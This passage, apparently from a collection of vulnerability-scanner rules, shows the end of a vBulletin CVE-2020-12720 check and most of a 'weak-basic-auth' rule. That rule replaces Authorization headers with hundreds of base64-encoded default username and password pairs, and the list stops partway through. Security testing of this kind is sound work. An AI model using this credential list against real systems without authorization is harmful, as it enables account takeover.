Known affected software configurations vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1." 42 | - additional: "To resolve this vulnerability, the software should be updated to the current version." 43 | - tags: 44 | - CVE-2020-12720 45 | - vBulletin 46 | -------------------------------------------------------------------------------- /weak-basic-auth.yaml: -------------------------------------------------------------------------------- 1 | #Attention! For this DSL detect you must use a custom test policy with HEADER_* insertion point! 2 | collect: 3 | - uniq: 4 | - [URI] 5 | 6 | match: 7 | - 'HEADER_AUTHORIZATION_value': '^(Basic|Digest)' 8 | 9 | generate: 10 | - into: HEADER_AUTHORIZATION 11 | - method: 12 | - replace 13 | - payload: 14 | - "BASIC cm9vdDo=" #root: 15 | - "BASIC cm9vdDohUUFaMndzeA==" #root:!QAZ2wsx 16 | - "BASIC cm9vdDohcWF6QHdzeA==" #root:!qaz@wsx 17 | - "BASIC cm9vdDowMDAw" #root:0000 18 | - "BASIC cm9vdDowMDAwMDA=" #root:000000 19 | - "BASIC cm9vdDowMDAwMDAw" #root:0000000 20 | - "BASIC cm9vdDowMDAwMDAwMA==" #root:00000000 21 | - "BASIC cm9vdDowOTg3NjU0MzIx" #root:0987654321 22 | - "BASIC cm9vdDow" #root:0 23 | - "BASIC cm9vdDox" #root:1 24 | - "BASIC cm9vdDoy" #root:2 25 | - "BASIC cm9vdDoz" #root:3 26 | - "BASIC cm9vdDo0" #root:4 27 | - "BASIC cm9vdDo1" #root:5 28 | - "BASIC cm9vdDo2" #root:6 29 | - "BASIC cm9vdDo3" #root:7 30 | - "BASIC cm9vdDo4" #root:8 31 | - "BASIC cm9vdDo5" #root:9 32 | - "BASIC cm9vdDoxMTEx" #root:1111 33 | - "BASIC cm9vdDoxMTExMQ==" #root:11111 34 | - "BASIC cm9vdDoxMTExMTE=" #root:111111 35 | - "BASIC cm9vdDoxMTExMTEx" #root:1111111 36 | - "BASIC cm9vdDoxMTExMTExMQ==" #root:11111111 37 | - "BASIC cm9vdDoxMTIyMzM=" #root:112233 38 | - "BASIC cm9vdDoxMjEyMTI=" #root:121212 39 | - "BASIC cm9vdDoxMjM=" #root:123 40 | - "BASIC cm9vdDoxMjMxMjM=" #root:123123 41 | - "BASIC cm9vdDoxMjMzMjE=" #root:123321 42 | - "BASIC cm9vdDoxMjM0" #root:1234 43 | - "BASIC cm9vdDoxMjM0NQ==" #root:12345 44 | - "BASIC 
cm9vdDoxMjM0NTY=" #root:123456 45 | - "BASIC cm9vdDoxMjM0NTY3" #root:1234567 46 | - "BASIC cm9vdDoxMjM0NTY3OA==" #root:12345678 47 | - "BASIC cm9vdDoxMjM0NTY3ODk=" #root:123456789 48 | - "BASIC cm9vdDoxMjM0NTY3ODkw" #root:1234567890 49 | - "BASIC cm9vdDoxMjM0YWJjZA==" #root:1234abcd 50 | - "BASIC cm9vdDoxMjM0cXdlcg==" #root:1234qwer 51 | - "BASIC cm9vdDoxMjNhYmM=" #root:123abc 52 | - "BASIC cm9vdDoxMjNhc2Q=" #root:123asd 53 | - "BASIC cm9vdDoxMjNxd2U=" #root:123qwe 54 | - "BASIC cm9vdDoxMjNxd2Vhc2Q=" #root:123qweasd 55 | - "BASIC cm9vdDoxMnF3YXN6eA==" #root:12qwaszx 56 | - "BASIC cm9vdDoxZTJlM2U=" #root:1e2e3e 57 | - "BASIC cm9vdDoxZTJlM2U0ZQ==" #root:1e2e3e4e 58 | - "BASIC cm9vdDoxcTJxM3E=" #root:1q2q3q 59 | - "BASIC cm9vdDoxcTJxM3E0cQ==" #root:1q2q3q4q 60 | - "BASIC cm9vdDoxcTJ3M2U=" #root:1q2w3e 61 | - "BASIC cm9vdDoxcTJ3M2U0cg==" #root:1q2w3e4r 62 | - "BASIC cm9vdDoxcTJ3M2U0cjV0" #root:1q2w3e4r5t 63 | - "BASIC cm9vdDoxcWF6MndzeA==" #root:1qaz2wsx 64 | - "BASIC cm9vdDoxcWF6MndzeDNlZGM=" #root:1qaz2wsx3edc 65 | - "BASIC cm9vdDoxcWF6eHN3Mg==" #root:1qazxsw2 66 | - "BASIC cm9vdDoxcWF6WFNXQA==" #root:1qazXSW@ 67 | - "BASIC cm9vdDoxdzJxIVdAUQ==" #root:1w2q!W@Q 68 | - "BASIC cm9vdDoxdzJ3M3c=" #root:1w2w3w 69 | - "BASIC cm9vdDoxdzJ3M3c0dw==" #root:1w2w3w4w 70 | - "BASIC cm9vdDo1NDMyMQ==" #root:54321 71 | - "BASIC cm9vdDo2NTQzMjE=" #root:654321 72 | - "BASIC cm9vdDo4ODg4ODg=" #root:888888 73 | - "BASIC cm9vdDph" #root:a 74 | - "BASIC cm9vdDphYmMxMjM=" #root:abc123 75 | - "BASIC cm9vdDphYmNkMTIzNA==" #root:abcd1234 76 | - "BASIC cm9vdDpBZG1pbg==" #root:Admin 77 | - "BASIC cm9vdDphZG1pbg==" #root:admin 78 | - "BASIC cm9vdDphZG1pbiFA" #root:admin!@ 79 | - "BASIC cm9vdDphZG1pbjE=" #root:admin1 80 | - "BASIC cm9vdDphZG1pbjEy" #root:admin12 81 | - "BASIC cm9vdDphZG1pbjEyMw==" #root:admin123 82 | - "BASIC cm9vdDphZG1pbjEyMzQ1Ng==" #root:admin123456 83 | - "BASIC cm9vdDphZG1pbmlzdHJhdG9y" #root:administrator 84 | - "BASIC cm9vdDphbHBpbmU=" #root:alpine 85 | - "BASIC 
cm9vdDphc2QxMjM=" #root:asd123 86 | - "BASIC cm9vdDphc2Rm" #root:asdf 87 | - "BASIC cm9vdDphc2RmMTIzNA==" #root:asdf1234 88 | - "BASIC cm9vdDphc2RmZ2g=" #root:asdfgh 89 | - "BASIC cm9vdDpjZW50b3M=" #root:centos 90 | - "BASIC cm9vdDpjaGFuZ2VtZQ==" #root:changeme 91 | - "BASIC cm9vdDpjaXNjbw==" #root:cisco 92 | - "BASIC cm9vdDpjaXNjbzEyMw==" #root:cisco123 93 | - "BASIC cm9vdDpkZWZhdWx0" #root:default 94 | - "BASIC cm9vdDppZGMhQA==" #root:idc!@ 95 | - "BASIC cm9vdDpqaWFtaW1h" #root:jiamima 96 | - "BASIC cm9vdDpsZXRtZWlu" #root:letmein 97 | - "BASIC cm9vdDpsaW51eA==" #root:linux 98 | - "BASIC cm9vdDptYW5hZ2Vy" #root:manager 99 | - "BASIC cm9vdDptYXN0ZXI=" #root:master 100 | - "BASIC cm9vdDpvcmFjbGU=" #root:oracle 101 | - "BASIC cm9vdDpwQCQkdzByZA==" #root:p@$$w0rd 102 | - "BASIC cm9vdDpQQHNzdzByZA==" #root:P@ssw0rd 103 | - "BASIC cm9vdDpwQHNzdzByZA==" #root:p@ssw0rd 104 | - "BASIC cm9vdDpQQHNzdzByZCE=" #root:P@ssw0rd! 105 | - "BASIC cm9vdDpwQHNzd29yZA==" #root:p@ssword 106 | - "BASIC cm9vdDpwYTU1dzByZA==" #root:pa55w0rd 107 | - "BASIC cm9vdDpwYXNz" #root:pass 108 | - "BASIC cm9vdDpwYXNzdzByZA==" #root:passw0rd 109 | - "BASIC cm9vdDpwYXNzd29yZA==" #root:password 110 | - "BASIC cm9vdDpwYXNzd29yZDEyMw==" #root:password123 111 | - "BASIC cm9vdDpxMXcyZTM=" #root:q1w2e3 112 | - "BASIC cm9vdDpxMXcyZTNyNA==" #root:q1w2e3r4 113 | - "BASIC cm9vdDpxMXcyZTNyNHQ1" #root:q1w2e3r4t5 114 | - "BASIC cm9vdDpxYXp3c3hlZGM=" #root:qazwsxedc 115 | - "BASIC cm9vdDpxd2UxMjM=" #root:qwe123 116 | - "BASIC cm9vdDpxd2VyMTIzNA==" #root:qwer1234 117 | - "BASIC cm9vdDpxd2VydHk=" #root:qwerty 118 | - "BASIC cm9vdDpxd2VydHkxMjM=" #root:qwerty123 119 | - "BASIC cm9vdDpyZWRoYXQ=" #root:redhat 120 | - "BASIC cm9vdDpyb290" #root:root 121 | - "BASIC cm9vdDpyb290MTIz" #root:root123 122 | - "BASIC cm9vdDpyb290MTIzNA==" #root:root1234 123 | - "BASIC cm9vdDpyb290QDEyMw==" #root:root@123 124 | - "BASIC cm9vdDpyb290cm9vdA==" #root:rootroot 125 | - "BASIC cm9vdDpzZXJ2ZXI=" #root:server 126 | - "BASIC 
cm9vdDpzdXBlcnVzZXI=" #root:superuser 127 | - "BASIC cm9vdDpzeXN0ZW0=" #root:system 128 | - "BASIC cm9vdDpUZXN0" #root:Test 129 | - "BASIC cm9vdDp0ZXN0" #root:test 130 | - "BASIC cm9vdDp0ZXN0MTIz" #root:test123 131 | - "BASIC cm9vdDp0b29y" #root:toor 132 | - "BASIC cm9vdDp1Ym50" #root:ubnt 133 | - "BASIC cm9vdDp1YnVudHU=" #root:ubuntu 134 | - "BASIC cm9vdDpVc2Vy" #root:User 135 | - "BASIC cm9vdDp1c2Vy" #root:user 136 | - "BASIC cm9vdDp2bXdhcmU=" #root:vmware 137 | - "BASIC cm9vdDp3ZWxjb21l" #root:welcome 138 | - "BASIC cm9vdDp3dWJhbw==" #root:wubao 139 | - "BASIC cm9vdDp6YXExMndzeA==" #root:zaq12wsx 140 | - "BASIC cm9vdDp6eGN2Ym4=" #root:zxcvbn 141 | - "BASIC cm9vdDp6eGN2Ym5t" #root:zxcvbnm 142 | - "BASIC cm9vdDpjaGFuZ2VpdA==" #root:changeit 143 | - "BASIC YWRtaW46" #admin: 144 | - "BASIC YWRtaW46IVFBWjJ3c3g=" #admin:!QAZ2wsx 145 | - "BASIC YWRtaW46IXFhekB3c3g=" #admin:!qaz@wsx 146 | - "BASIC YWRtaW46MDAwMA==" #admin:0000 147 | - "BASIC YWRtaW46MDAwMDAw" #admin:000000 148 | - "BASIC YWRtaW46MDAwMDAwMA==" #admin:0000000 149 | - "BASIC YWRtaW46MDAwMDAwMDA=" #admin:00000000 150 | - "BASIC YWRtaW46MDk4NzY1NDMyMQ==" #admin:0987654321 151 | - "BASIC YWRtaW46MA==" #admin:0 152 | - "BASIC YWRtaW46MQ==" #admin:1 153 | - "BASIC YWRtaW46Mg==" #admin:2 154 | - "BASIC YWRtaW46Mw==" #admin:3 155 | - "BASIC YWRtaW46NA==" #admin:4 156 | - "BASIC YWRtaW46NQ==" #admin:5 157 | - "BASIC YWRtaW46Ng==" #admin:6 158 | - "BASIC YWRtaW46Nw==" #admin:7 159 | - "BASIC YWRtaW46OA==" #admin:8 160 | - "BASIC YWRtaW46OQ==" #admin:9 161 | - "BASIC YWRtaW46MTExMQ==" #admin:1111 162 | - "BASIC YWRtaW46MTExMTE=" #admin:11111 163 | - "BASIC YWRtaW46MTExMTEx" #admin:111111 164 | - "BASIC YWRtaW46MTExMTExMQ==" #admin:1111111 165 | - "BASIC YWRtaW46MTExMTExMTE=" #admin:11111111 166 | - "BASIC YWRtaW46MTEyMjMz" #admin:112233 167 | - "BASIC YWRtaW46MTIxMjEy" #admin:121212 168 | - "BASIC YWRtaW46MTIz" #admin:123 169 | - "BASIC YWRtaW46MTIzMTIz" #admin:123123 170 | - "BASIC YWRtaW46MTIzMzIx" #admin:123321 
171 | - "BASIC YWRtaW46MTIzNA==" #admin:1234 172 | - "BASIC YWRtaW46MTIzNDU=" #admin:12345 173 | - "BASIC YWRtaW46MTIzNDU2" #admin:123456 174 | - "BASIC YWRtaW46MTIzNDU2Nw==" #admin:1234567 175 | - "BASIC YWRtaW46MTIzNDU2Nzg=" #admin:12345678 176 | - "BASIC YWRtaW46MTIzNDU2Nzg5" #admin:123456789 177 | - "BASIC YWRtaW46MTIzNDU2Nzg5MA==" #admin:1234567890 178 | - "BASIC YWRtaW46MTIzNGFiY2Q=" #admin:1234abcd 179 | - "BASIC YWRtaW46MTIzNHF3ZXI=" #admin:1234qwer 180 | - "BASIC YWRtaW46MTIzYWJj" #admin:123abc 181 | - "BASIC YWRtaW46MTIzYXNk" #admin:123asd 182 | - "BASIC YWRtaW46MTIzcXdl" #admin:123qwe 183 | - "BASIC YWRtaW46MTIzcXdlYXNk" #admin:123qweasd 184 | - "BASIC YWRtaW46MTJxd2Fzeng=" #admin:12qwaszx 185 | - "BASIC YWRtaW46MWUyZTNl" #admin:1e2e3e 186 | - "BASIC YWRtaW46MWUyZTNlNGU=" #admin:1e2e3e4e 187 | - "BASIC YWRtaW46MXEycTNx" #admin:1q2q3q 188 | - "BASIC YWRtaW46MXEycTNxNHE=" #admin:1q2q3q4q 189 | - "BASIC YWRtaW46MXEydzNl" #admin:1q2w3e 190 | - "BASIC YWRtaW46MXEydzNlNHI=" #admin:1q2w3e4r 191 | - "BASIC YWRtaW46MXEydzNlNHI1dA==" #admin:1q2w3e4r5t 192 | - "BASIC YWRtaW46MXFhejJ3c3g=" #admin:1qaz2wsx 193 | - "BASIC YWRtaW46MXFhejJ3c3gzZWRj" #admin:1qaz2wsx3edc 194 | - "BASIC YWRtaW46MXFhenhzdzI=" #admin:1qazxsw2 195 | - "BASIC YWRtaW46MXFhelhTV0A=" #admin:1qazXSW@ 196 | - "BASIC YWRtaW46MXcycSFXQFE=" #admin:1w2q!W@Q 197 | - "BASIC YWRtaW46MXcydzN3" #admin:1w2w3w 198 | - "BASIC YWRtaW46MXcydzN3NHc=" #admin:1w2w3w4w 199 | - "BASIC YWRtaW46NTQzMjE=" #admin:54321 200 | - "BASIC YWRtaW46NjU0MzIx" #admin:654321 201 | - "BASIC YWRtaW46ODg4ODg4" #admin:888888 202 | - "BASIC YWRtaW46YQ==" #admin:a 203 | - "BASIC YWRtaW46YWJjMTIz" #admin:abc123 204 | - "BASIC YWRtaW46YWJjZDEyMzQ=" #admin:abcd1234 205 | - "BASIC YWRtaW46QWRtaW4=" #admin:Admin 206 | - "BASIC YWRtaW46YWRtaW4=" #admin:admin 207 | - "BASIC YWRtaW46YWRtaW4hQA==" #admin:admin!@ 208 | - "BASIC YWRtaW46YWRtaW4x" #admin:admin1 209 | - "BASIC YWRtaW46YWRtaW4xMg==" #admin:admin12 210 | - "BASIC YWRtaW46YWRtaW4xMjM=" 
#admin:admin123 211 | - "BASIC YWRtaW46YWRtaW4xMjM0NTY=" #admin:admin123456 212 | - "BASIC YWRtaW46YWRtaW5pc3RyYXRvcg==" #admin:administrator 213 | - "BASIC YWRtaW46YWxwaW5l" #admin:alpine 214 | - "BASIC YWRtaW46YXNkMTIz" #admin:asd123 215 | - "BASIC YWRtaW46YXNkZg==" #admin:asdf 216 | - "BASIC YWRtaW46YXNkZjEyMzQ=" #admin:asdf1234 217 | - "BASIC YWRtaW46YXNkZmdo" #admin:asdfgh 218 | - "BASIC YWRtaW46Y2VudG9z" #admin:centos 219 | - "BASIC YWRtaW46Y2hhbmdlbWU=" #admin:changeme 220 | - "BASIC YWRtaW46Y2lzY28=" #admin:cisco 221 | - "BASIC YWRtaW46Y2lzY28xMjM=" #admin:cisco123 222 | - "BASIC YWRtaW46ZGVmYXVsdA==" #admin:default 223 | - "BASIC YWRtaW46aWRjIUA=" #admin:idc!@ 224 | - "BASIC YWRtaW46amlhbWltYQ==" #admin:jiamima 225 | - "BASIC YWRtaW46bGV0bWVpbg==" #admin:letmein 226 | - "BASIC YWRtaW46bGludXg=" #admin:linux 227 | - "BASIC YWRtaW46bWFuYWdlcg==" #admin:manager 228 | - "BASIC YWRtaW46bWFzdGVy" #admin:master 229 | - "BASIC YWRtaW46b3JhY2xl" #admin:oracle 230 | - "BASIC YWRtaW46cEAkJHcwcmQ=" #admin:p@$$w0rd 231 | - "BASIC YWRtaW46UEBzc3cwcmQ=" #admin:P@ssw0rd 232 | - "BASIC YWRtaW46cEBzc3cwcmQ=" #admin:p@ssw0rd 233 | - "BASIC YWRtaW46UEBzc3cwcmQh" #admin:P@ssw0rd! 
234 | - "BASIC YWRtaW46cEBzc3dvcmQ=" #admin:p@ssword 235 | - "BASIC YWRtaW46cGE1NXcwcmQ=" #admin:pa55w0rd 236 | - "BASIC YWRtaW46cGFzcw==" #admin:pass 237 | - "BASIC YWRtaW46cGFzc3cwcmQ=" #admin:passw0rd 238 | - "BASIC YWRtaW46cGFzc3dvcmQ=" #admin:password 239 | - "BASIC YWRtaW46cGFzc3dvcmQxMjM=" #admin:password123 240 | - "BASIC YWRtaW46cTF3MmUz" #admin:q1w2e3 241 | - "BASIC YWRtaW46cTF3MmUzcjQ=" #admin:q1w2e3r4 242 | - "BASIC YWRtaW46cTF3MmUzcjR0NQ==" #admin:q1w2e3r4t5 243 | - "BASIC YWRtaW46cWF6d3N4ZWRj" #admin:qazwsxedc 244 | - "BASIC YWRtaW46cXdlMTIz" #admin:qwe123 245 | - "BASIC YWRtaW46cXdlcjEyMzQ=" #admin:qwer1234 246 | - "BASIC YWRtaW46cXdlcnR5" #admin:qwerty 247 | - "BASIC YWRtaW46cXdlcnR5MTIz" #admin:qwerty123 248 | - "BASIC YWRtaW46cmVkaGF0" #admin:redhat 249 | - "BASIC YWRtaW46cm9vdA==" #admin:root 250 | - "BASIC YWRtaW46cm9vdDEyMw==" #admin:root123 251 | - "BASIC YWRtaW46cm9vdDEyMzQ=" #admin:root1234 252 | - "BASIC YWRtaW46cm9vdEAxMjM=" #admin:root@123 253 | - "BASIC YWRtaW46cm9vdHJvb3Q=" #admin:rootroot 254 | - "BASIC YWRtaW46c2VydmVy" #admin:server 255 | - "BASIC YWRtaW46c3VwZXJ1c2Vy" #admin:superuser 256 | - "BASIC YWRtaW46c3lzdGVt" #admin:system 257 | - "BASIC YWRtaW46VGVzdA==" #admin:Test 258 | - "BASIC YWRtaW46dGVzdA==" #admin:test 259 | - "BASIC YWRtaW46dGVzdDEyMw==" #admin:test123 260 | - "BASIC YWRtaW46dG9vcg==" #admin:toor 261 | - "BASIC YWRtaW46dWJudA==" #admin:ubnt 262 | - "BASIC YWRtaW46dWJ1bnR1" #admin:ubuntu 263 | - "BASIC YWRtaW46VXNlcg==" #admin:User 264 | - "BASIC YWRtaW46dXNlcg==" #admin:user 265 | - "BASIC YWRtaW46dm13YXJl" #admin:vmware 266 | - "BASIC YWRtaW46d2VsY29tZQ==" #admin:welcome 267 | - "BASIC YWRtaW46d3ViYW8=" #admin:wubao 268 | - "BASIC YWRtaW46emFxMTJ3c3g=" #admin:zaq12wsx 269 | - "BASIC YWRtaW46enhjdmJu" #admin:zxcvbn 270 | - "BASIC YWRtaW46enhjdmJubQ==" #admin:zxcvbnm 271 | - "BASIC YWRtaW46Y2hhbmdlaXQ=" #admin:changeit 272 | - "BASIC QWRtaW46" #Admin: 273 | - "BASIC QWRtaW46IVFBWjJ3c3g=" #Admin:!QAZ2wsx 274 | - 
"BASIC QWRtaW46IXFhekB3c3g=" #Admin:!qaz@wsx 275 | - "BASIC QWRtaW46MDAwMA==" #Admin:0000 276 | - "BASIC QWRtaW46MDAwMDAw" #Admin:000000 277 | - "BASIC QWRtaW46MDAwMDAwMA==" #Admin:0000000 278 | - "BASIC QWRtaW46MDAwMDAwMDA=" #Admin:00000000 279 | - "BASIC QWRtaW46MDk4NzY1NDMyMQ==" #Admin:0987654321 280 | - "BASIC QWRtaW46MA==" #Admin:0 281 | - "BASIC QWRtaW46MQ==" #Admin:1 282 | - "BASIC QWRtaW46Mg==" #Admin:2 283 | - "BASIC QWRtaW46Mw==" #Admin:3 284 | - "BASIC QWRtaW46NA==" #Admin:4 285 | - "BASIC QWRtaW46NQ==" #Admin:5 286 | - "BASIC QWRtaW46Ng==" #Admin:6 287 | - "BASIC QWRtaW46Nw==" #Admin:7 288 | - "BASIC QWRtaW46OA==" #Admin:8 289 | - "BASIC QWRtaW46OQ==" #Admin:9 290 | - "BASIC QWRtaW46MTExMQ==" #Admin:1111 291 | - "BASIC QWRtaW46MTExMTE=" #Admin:11111 292 | - "BASIC QWRtaW46MTExMTEx" #Admin:111111 293 | - "BASIC QWRtaW46MTExMTExMQ==" #Admin:1111111 294 | - "BASIC QWRtaW46MTExMTExMTE=" #Admin:11111111 295 | - "BASIC QWRtaW46MTEyMjMz" #Admin:112233 296 | - "BASIC QWRtaW46MTIxMjEy" #Admin:121212 297 | - "BASIC QWRtaW46MTIz" #Admin:123 298 | - "BASIC QWRtaW46MTIzMTIz" #Admin:123123 299 | - "BASIC QWRtaW46MTIzMzIx" #Admin:123321 300 | - "BASIC QWRtaW46MTIzNA==" #Admin:1234 301 | - "BASIC QWRtaW46MTIzNDU=" #Admin:12345 302 | - "BASIC QWRtaW46MTIzNDU2" #Admin:123456 303 | - "BASIC QWRtaW46MTIzNDU2Nw==" #Admin:1234567 304 | - "BASIC QWRtaW46MTIzNDU2Nzg=" #Admin:12345678 305 | - "BASIC QWRtaW46MTIzNDU2Nzg5" #Admin:123456789 306 | - "BASIC QWRtaW46MTIzNDU2Nzg5MA==" #Admin:1234567890 307 | - "BASIC QWRtaW46MTIzNGFiY2Q=" #Admin:1234abcd 308 | - "BASIC QWRtaW46MTIzNHF3ZXI=" #Admin:1234qwer 309 | - "BASIC QWRtaW46MTIzYWJj" #Admin:123abc 310 | - "BASIC QWRtaW46MTIzYXNk" #Admin:123asd 311 | - "BASIC QWRtaW46MTIzcXdl" #Admin:123qwe 312 | - "BASIC QWRtaW46MTIzcXdlYXNk" #Admin:123qweasd 313 | - "BASIC QWRtaW46MTJxd2Fzeng=" #Admin:12qwaszx 314 | - "BASIC QWRtaW46MWUyZTNl" #Admin:1e2e3e 315 | - "BASIC QWRtaW46MWUyZTNlNGU=" #Admin:1e2e3e4e 316 | - "BASIC QWRtaW46MXEycTNx" 
#Admin:1q2q3q 317 | - "BASIC QWRtaW46MXEycTNxNHE=" #Admin:1q2q3q4q 318 | - "BASIC QWRtaW46MXEydzNl" #Admin:1q2w3e 319 | - "BASIC QWRtaW46MXEydzNlNHI=" #Admin:1q2w3e4r 320 | - "BASIC QWRtaW46MXEydzNlNHI1dA==" #Admin:1q2w3e4r5t 321 | - "BASIC QWRtaW46MXFhejJ3c3g=" #Admin:1qaz2wsx 322 | - "BASIC QWRtaW46MXFhejJ3c3gzZWRj" #Admin:1qaz2wsx3edc 323 | - "BASIC QWRtaW46MXFhenhzdzI=" #Admin:1qazxsw2 324 | - "BASIC QWRtaW46MXFhelhTV0A=" #Admin:1qazXSW@ 325 | - "BASIC QWRtaW46MXcycSFXQFE=" #Admin:1w2q!W@Q 326 | - "BASIC QWRtaW46MXcydzN3" #Admin:1w2w3w 327 | - "BASIC QWRtaW46MXcydzN3NHc=" #Admin:1w2w3w4w 328 | - "BASIC QWRtaW46NTQzMjE=" #Admin:54321 329 | - "BASIC QWRtaW46NjU0MzIx" #Admin:654321 330 | - "BASIC QWRtaW46ODg4ODg4" #Admin:888888 331 | - "BASIC QWRtaW46YQ==" #Admin:a 332 | - "BASIC QWRtaW46YWJjMTIz" #Admin:abc123 333 | - "BASIC QWRtaW46YWJjZDEyMzQ=" #Admin:abcd1234 334 | - "BASIC QWRtaW46QWRtaW4=" #Admin:Admin 335 | - "BASIC QWRtaW46YWRtaW4=" #Admin:admin 336 | - "BASIC QWRtaW46YWRtaW4hQA==" #Admin:admin!@ 337 | - "BASIC QWRtaW46YWRtaW4x" #Admin:admin1 338 | - "BASIC QWRtaW46YWRtaW4xMg==" #Admin:admin12 339 | - "BASIC QWRtaW46YWRtaW4xMjM=" #Admin:admin123 340 | - "BASIC QWRtaW46YWRtaW4xMjM0NTY=" #Admin:admin123456 341 | - "BASIC QWRtaW46YWRtaW5pc3RyYXRvcg==" #Admin:administrator 342 | - "BASIC QWRtaW46YWxwaW5l" #Admin:alpine 343 | - "BASIC QWRtaW46YXNkMTIz" #Admin:asd123 344 | - "BASIC QWRtaW46YXNkZg==" #Admin:asdf 345 | - "BASIC QWRtaW46YXNkZjEyMzQ=" #Admin:asdf1234 346 | - "BASIC QWRtaW46YXNkZmdo" #Admin:asdfgh 347 | - "BASIC QWRtaW46Y2VudG9z" #Admin:centos 348 | - "BASIC QWRtaW46Y2hhbmdlbWU=" #Admin:changeme 349 | - "BASIC QWRtaW46Y2lzY28=" #Admin:cisco 350 | - "BASIC QWRtaW46Y2lzY28xMjM=" #Admin:cisco123 351 | - "BASIC QWRtaW46ZGVmYXVsdA==" #Admin:default 352 | - "BASIC QWRtaW46aWRjIUA=" #Admin:idc!@ 353 | - "BASIC QWRtaW46amlhbWltYQ==" #Admin:jiamima 354 | - "BASIC QWRtaW46bGV0bWVpbg==" #Admin:letmein 355 | - "BASIC QWRtaW46bGludXg=" #Admin:linux 356 | - "BASIC 
QWRtaW46bWFuYWdlcg==" #Admin:manager 357 | - "BASIC QWRtaW46bWFzdGVy" #Admin:master 358 | - "BASIC QWRtaW46b3JhY2xl" #Admin:oracle 359 | - "BASIC QWRtaW46cEAkJHcwcmQ=" #Admin:p@$$w0rd 360 | - "BASIC QWRtaW46UEBzc3cwcmQ=" #Admin:P@ssw0rd 361 | - "BASIC QWRtaW46cEBzc3cwcmQ=" #Admin:p@ssw0rd 362 | - "BASIC QWRtaW46UEBzc3cwcmQh" #Admin:P@ssw0rd! 363 | - "BASIC QWRtaW46cEBzc3dvcmQ=" #Admin:p@ssword 364 | - "BASIC QWRtaW46cGE1NXcwcmQ=" #Admin:pa55w0rd 365 | - "BASIC QWRtaW46cGFzcw==" #Admin:pass 366 | - "BASIC QWRtaW46cGFzc3cwcmQ=" #Admin:passw0rd 367 | - "BASIC QWRtaW46cGFzc3dvcmQ=" #Admin:password 368 | - "BASIC QWRtaW46cGFzc3dvcmQxMjM=" #Admin:password123 369 | - "BASIC QWRtaW46cTF3MmUz" #Admin:q1w2e3 370 | - "BASIC QWRtaW46cTF3MmUzcjQ=" #Admin:q1w2e3r4 371 | - "BASIC QWRtaW46cTF3MmUzcjR0NQ==" #Admin:q1w2e3r4t5 372 | - "BASIC QWRtaW46cWF6d3N4ZWRj" #Admin:qazwsxedc 373 | - "BASIC QWRtaW46cXdlMTIz" #Admin:qwe123 374 | - "BASIC QWRtaW46cXdlcjEyMzQ=" #Admin:qwer1234 375 | - "BASIC QWRtaW46cXdlcnR5" #Admin:qwerty 376 | - "BASIC QWRtaW46cXdlcnR5MTIz" #Admin:qwerty123 377 | - "BASIC QWRtaW46cmVkaGF0" #Admin:redhat 378 | - "BASIC QWRtaW46cm9vdA==" #Admin:root 379 | - "BASIC QWRtaW46cm9vdDEyMw==" #Admin:root123 380 | - "BASIC QWRtaW46cm9vdDEyMzQ=" #Admin:root1234 381 | - "BASIC QWRtaW46cm9vdEAxMjM=" #Admin:root@123 382 | - "BASIC QWRtaW46cm9vdHJvb3Q=" #Admin:rootroot 383 | - "BASIC QWRtaW46c2VydmVy" #Admin:server 384 | - "BASIC QWRtaW46c3VwZXJ1c2Vy" #Admin:superuser 385 | - "BASIC QWRtaW46c3lzdGVt" #Admin:system 386 | - "BASIC QWRtaW46VGVzdA==" #Admin:Test 387 | - "BASIC QWRtaW46dGVzdA==" #Admin:test 388 | - "BASIC QWRtaW46dGVzdDEyMw==" #Admin:test123 389 | - "BASIC QWRtaW46dG9vcg==" #Admin:toor 390 | - "BASIC QWRtaW46dWJudA==" #Admin:ubnt 391 | - "BASIC QWRtaW46dWJ1bnR1" #Admin:ubuntu 392 | - "BASIC QWRtaW46VXNlcg==" #Admin:User 393 | - "BASIC QWRtaW46dXNlcg==" #Admin:user 394 | - "BASIC QWRtaW46dm13YXJl" #Admin:vmware 395 | - "BASIC QWRtaW46d2VsY29tZQ==" #Admin:welcome 396 | 
- "BASIC QWRtaW46d3ViYW8=" #Admin:wubao 397 | - "BASIC QWRtaW46emFxMTJ3c3g=" #Admin:zaq12wsx 398 | - "BASIC QWRtaW46enhjdmJu" #Admin:zxcvbn 399 | - "BASIC QWRtaW46enhjdmJubQ==" #Admin:zxcvbnm 400 | - "BASIC QWRtaW46Y2hhbmdlaXQ=" #Admin:changeit 401 | - "BASIC dGVzdDo=" #test: 402 | - "BASIC dGVzdDohUUFaMndzeA==" #test:!QAZ2wsx 403 | - "BASIC dGVzdDohcWF6QHdzeA==" #test:!qaz@wsx 404 | - "BASIC dGVzdDowMDAw" #test:0000 405 | - "BASIC dGVzdDowMDAwMDA=" #test:000000 406 | - "BASIC dGVzdDowMDAwMDAw" #test:0000000 407 | - "BASIC dGVzdDowMDAwMDAwMA==" #test:00000000 408 | - "BASIC dGVzdDowOTg3NjU0MzIx" #test:0987654321 409 | - "BASIC dGVzdDow" #test:0 410 | - "BASIC dGVzdDox" #test:1 411 | - "BASIC dGVzdDoy" #test:2 412 | - "BASIC dGVzdDoz" #test:3 413 | - "BASIC dGVzdDo0" #test:4 414 | - "BASIC dGVzdDo1" #test:5 415 | - "BASIC dGVzdDo2" #test:6 416 | - "BASIC dGVzdDo3" #test:7 417 | - "BASIC dGVzdDo4" #test:8 418 | - "BASIC dGVzdDo5" #test:9 419 | - "BASIC dGVzdDoxMTEx" #test:1111 420 | - "BASIC dGVzdDoxMTExMQ==" #test:11111 421 | - "BASIC dGVzdDoxMTExMTE=" #test:111111 422 | - "BASIC dGVzdDoxMTExMTEx" #test:1111111 423 | - "BASIC dGVzdDoxMTExMTExMQ==" #test:11111111 424 | - "BASIC dGVzdDoxMTIyMzM=" #test:112233 425 | - "BASIC dGVzdDoxMjEyMTI=" #test:121212 426 | - "BASIC dGVzdDoxMjM=" #test:123 427 | - "BASIC dGVzdDoxMjMxMjM=" #test:123123 428 | - "BASIC dGVzdDoxMjMzMjE=" #test:123321 429 | - "BASIC dGVzdDoxMjM0" #test:1234 430 | - "BASIC dGVzdDoxMjM0NQ==" #test:12345 431 | - "BASIC dGVzdDoxMjM0NTY=" #test:123456 432 | - "BASIC dGVzdDoxMjM0NTY3" #test:1234567 433 | - "BASIC dGVzdDoxMjM0NTY3OA==" #test:12345678 434 | - "BASIC dGVzdDoxMjM0NTY3ODk=" #test:123456789 435 | - "BASIC dGVzdDoxMjM0NTY3ODkw" #test:1234567890 436 | - 